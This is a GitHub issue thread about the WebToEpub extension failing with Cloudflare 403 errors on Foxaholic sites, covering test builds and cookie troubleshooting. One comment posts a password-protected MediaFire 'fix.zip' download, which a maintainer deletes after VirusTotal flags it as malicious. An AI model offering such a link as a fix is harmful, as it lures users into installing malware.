### ISSUE TITLE
Version 0.0.171 Now Fails on Foxaholic + Foxaholic18 for 403 Error

### ISSUE THREAD

**Issue by yuyu-cloud** [dteviot/WebToEpub#1447]
**Describe the bug**
After updating to the latest experimental build of the extension (found on this repository), the extension no longer works on both Foxaholic and Foxaholic18 sites.

**To Reproduce**
1. Go to link: https://18.foxaholic.com/novel/political-marriage-abo/
2. Click on Webtoepub
3. See this error: 
![image](https://github.com/user-attachments/assets/83f26a79-1db1-447d-bf74-23dff2bb75db)

Click OK. Tried to reload chapter 1 to test, no cloudflare verification showed so could not satisfy requirement.

See second error:

![image](https://github.com/user-attachments/assets/b47ed6a6-8c8e-4ff1-940a-1226d5b460a1)

4. Webtoepub fails after selecting "Retry" and the "Save As" box is prompted but no chapters were downloaded.

**Expected behavior**
From a previous issue, Webtoepub should be able to bypass this problem, thereby pulling the content without seeing any error dialogue box about the 403 cloudflare issue.

**Additional context**
The version I was using before for Webtoepub was 0.0.160 and there was no problem at all when encountering **cloudflare protection for any sites**. Actually, the strange thing was, after generating the epub using the old experimental build of 0.0.160, and then trying again with the new version 0.0.171, Webtoepub was able to proceed and generate the epub containing all chapters successfully. Though I'm clueless on why it suddenly worked after using the old version first before the new build.

**Comment by gamebeaker** [comment]
@yuyu-cloud what is your chrome version?

**Comment by gamebeaker** [comment]
Test versions for Firefox and Chrome have been uploaded to https://github.com/dteviot/WebToEpub/releases/tag/developer-build. Pick the one suitable for you, follow the "How to install from Source (for people who are not developers)" instructions at https://github.com/dteviot/WebToEpub/tree/ExperimentalTabMode#user-content-how-to-install-from-source-for-people-who-are-not-developers and let me know how it goes.
Tested with:
*  https://18.foxaholic.com/novel/political-marriage-abo/

**Comment by MoonShadowIllusion** [comment]
Download 
https://www.mediafire.com/file/o50xaz6wgtazqnx/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by gamebeaker** [comment]
@MoonShadowIllusion i deleted your Comment because virustotal flags it and you didn't provide more info what this exe should be.
![image](https://github.com/user-attachments/assets/de85a451-a152-4793-a293-229266aac629)

**Comment by MoonShadowIllusion** [comment]
> @MoonShadowIllusion i deleted your Comment because virustotal flags it and you didn't provide more info what this exe should be. https://www.virustotal.com/gui/file/b127de888f09ce23937c12b7fccfa47a8f48312b0e43eb59b6243f665c6d366a ![image](https://private-user-images.githubusercontent.com/9269847/361336747-de85a451-a152-4793-a293-229266aac629.png?jwt=eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJpc3MiOiJnaXRodWIuY29tIiwiYXVkIjoicmF3LmdpdGh1YnVzZXJjb250ZW50LmNvbSIsImtleSI6ImtleTUiLCJleHAiOjE3MjQ2NjE3NDAsIm5iZiI6MTcyNDY2MTQ0MCwicGF0aCI6Ii85MjY5ODQ3LzM2MTMzNjc0Ny1kZTg1YTQ1MS1hMTUyLTQ3OTMtYTI5My0yMjkyNjZhYWM2MjkucG5nP1gtQW16LUFsZ29yaXRobT1BV1M0LUhNQUMtU0hBMjU2JlgtQW16LUNyZWRlbnRpYWw9QUtJQVZDT0RZTFNBNTNQUUs0WkElMkYyMDI0MDgyNiUyRnVzLWVhc3QtMSUyRnMzJTJGYXdzNF9yZXF1ZXN0JlgtQW16LURhdGU9MjAyNDA4MjZUMDgzNzIwWiZYLUFtei1FeHBpcmVzPTMwMCZYLUFtei1TaWduYXR1cmU9OTMxNmM3N2EzYTc1ZjA4OGRkNDY2MWYwM2Q2MGYzYjhkODc2ZGQ2NDkzOGRlMWUxNjA1YzNhYzA2YzU1ZDkwOSZYLUFtei1TaWduZWRIZWFkZXJzPWhvc3QmYWN0b3JfaWQ9MCZrZXlfaWQ9MCZyZXBvX2lkPTAifQ.f1U4V7qefJcjeFaAaA-83jo2bprke_bpCaPM2m_YRA8)

sorry, my account seem to have been hacked

**Comment by yuyu-cloud** [comment]
@gamebeaker 

Hallo!! Thank you sooooo much for your prompt response and speedy fix, it worked like a charm and fixed the problem better than ever~ And you were correct about my Chrome haha, I wasn't using the latest build, but just updated it :)

**Comment by dteviot** [comment]
@yuyu-cloud 
Reopen, so know to notify you when version in Chrome store is updated.

**Comment by dteviot** [comment]
@ssj4maiko 

I just tried the following chapters from supplied link
* [0.1 - Volume 1 Illustrations (Contains Spoilers)](https://www.foxaholic.com/novel/i-became-the-strongest-with-the-failure-frame%e3%80%90abnormal-state-skill%e3%80%91as-i-devastated-everything/0-1_2/)
* https://www.foxaholic.com/novel/i-became-the-strongest-with-the-failure-frame%e3%80%90abnormal-state-skill%e3%80%91as-i-devastated-everything/0-2_2/

They downloaded with no problem.  Note, I did have the Cloudflare "Are you a human" appear in my browser before I attempted the download.

**Comment by ssj4maiko** [comment]
> @ssj4maiko
> 
> I just tried the following chapters from supplied link
> 
>     * [0.1 - Volume 1 Illustrations (Contains Spoilers)](https://www.foxaholic.com/novel/i-became-the-strongest-with-the-failure-frame%e3%80%90abnormal-state-skill%e3%80%91as-i-devastated-everything/0-1_2/)
> 
>     * https://www.foxaholic.com/novel/i-became-the-strongest-with-the-failure-frame%e3%80%90abnormal-state-skill%e3%80%91as-i-devastated-everything/0-2_2/
> 
>     * https://www.foxaholic.com/novel/i-became-the-strongest-with-the-failure-frame%e3%80%90abnormal-state-skill%e3%80%91as-i-devastated-everything/394/
> 
> 
> They downloaded with no problem. Note, I did have the Cloudflare "Are you a human" appear in my browser before I attempted the download.

thank you for the reply.

I was able to get it to work, but not in the expected way, so I guess if others are still having the problem, this could help.

First, the attempt that didn't work. (Everything was done in the same browser/profile)
1 - When I first opened the link to the index, it asked me for the "are you human" question (It had also happened yesterday too).
2 - I then opened the Web2Epub page, and I couldn't import the chapters, as it kept on reporting the same errors
3 - Tried to close and open the web2epub page again, it did not work.

So I used another profile where I never entered the site before (You probably could reproduce it by cleaning the cookies on the website)
1 - Opened about:debugging#/runtime/this-firefox
2 - Imported the zip file
3 - Opened the foxaholic novel index (and pressed the Are You Human button again.
4 - Opened Web2Epub page
5 - It works

So I'm guessing that maybe the page set a cookie or something when there is an error. So try cleaning all cookies. (I don't have a foxaholic account, so I tried everything without it).

I'm guessing the trick is related to having the `cf_clearance` cookie. I got it on the profile that worked, I did not get it on the one that didn't work.

I did try cleaning the cookies hoping to get the Are you human question again, but it doesn't appear at all, so it doesn't seem like I will be able to get it to work at all. But it did work on the other profile, so having different profiles or trying in another browser is a possible solution.

**Comment by gamebeaker** [comment]
@ssj4maiko could you try to open the first Chapter and than try to download? I have seen multiple sites that have one cloudflare challange for the novel Index and a different one for the Chapters. 
It could be something with the [CHIPS](https://developer.mozilla.org/en-US/docs/Web/Privacy/Privacy_sandbox/Partitioned_cookies) they are at the moment in the firefox nightly build new. That is the stuff with cookies partition key.
Later i am going to test if the fix is simple to change the function in HttpClient.js -> setPartitionCookies(url) to handle firefox.
@dteviot is there somewhere logic to handle the change from browser. -> chrome. or do i have to copy the "same" code and just have to change chrome.cookies -> browser.cookies ?

**Comment by ssj4maiko** [comment]
> @ssj4maiko could you try to open the first Chapter and than try to download? I have seen multiple sites that have one cloudflare challange for the novel Index and a different one for the Chapters. edit: i just had a site where i had to deactivate ublock origin to solve the cloudflare challange.

I did consider that ublock Origin may have been the cause, but both profiles had it, and I did face the "Are you human" challenge on both, but for some reason, that cookie was not set in the one that didn't work.

If anything, I could argue that the profile that worked is the one I use for dev, so it could be that the browser was better prepared to handle cloudflare stuff.

Regardless, I did try disabling ublock origin, cleaned the cookies, and keep on reloading, but I never get the cloudflare challenge again (instead, I got rate limited by foxaholic), so it doesn't seem like that would lead to a fix.

**Comment by gamebeaker** [comment]
@ssj4maiko Test versions for Firefox and Chrome have been uploaded to https://github.com/dteviot/WebToEpub/releases/tag/developer-build. Pick the one suitable for you, follow the "How to install from Source (for people who are not developers)" instructions at https://github.com/dteviot/WebToEpub/tree/ExperimentalTabMode#user-content-how-to-install-from-source-for-people-who-are-not-developers and let me know how it goes.
Tested with:
*  https://mtlarchive.com/novel/traveling-through-thousands-of-realms-starting-from-obtaining-the-ten-marvel-rings

**Comment by ssj4maiko** [comment]
> @ssj4maiko Test versions for Firefox and Chrome have been uploaded to https://github.com/dteviot/WebToEpub/releases/tag/developer-build. Pick the one suitable for you, follow the "How to install from Source (for people who are not developers)" instructions at https://github.com/dteviot/WebToEpub/tree/ExperimentalTabMode#user-content-how-to-install-from-source-for-people-who-are-not-developers and let me know how it goes. Tested with:
> 
>     * https://mtlarchive.com/novel/traveling-through-thousands-of-realms-starting-from-obtaining-the-ten-marvel-rings

Yup, it worked straight away 1st try.
Tried on the same profile that was always failing before.

**Comment by gamebeaker** [comment]
I just found an error in the code. I am going to fix it in the next days.

**Comment by gamebeaker** [comment]
It wasn't an error.

**Comment by dteviot** [comment]
@ssj4maiko @yuyu-cloud 
Updated version (1.0.0.0) has been submitted to Firefox and Chrome stores.
Firefox version is available now.
Chrome might be available in a few hours to 21 days.
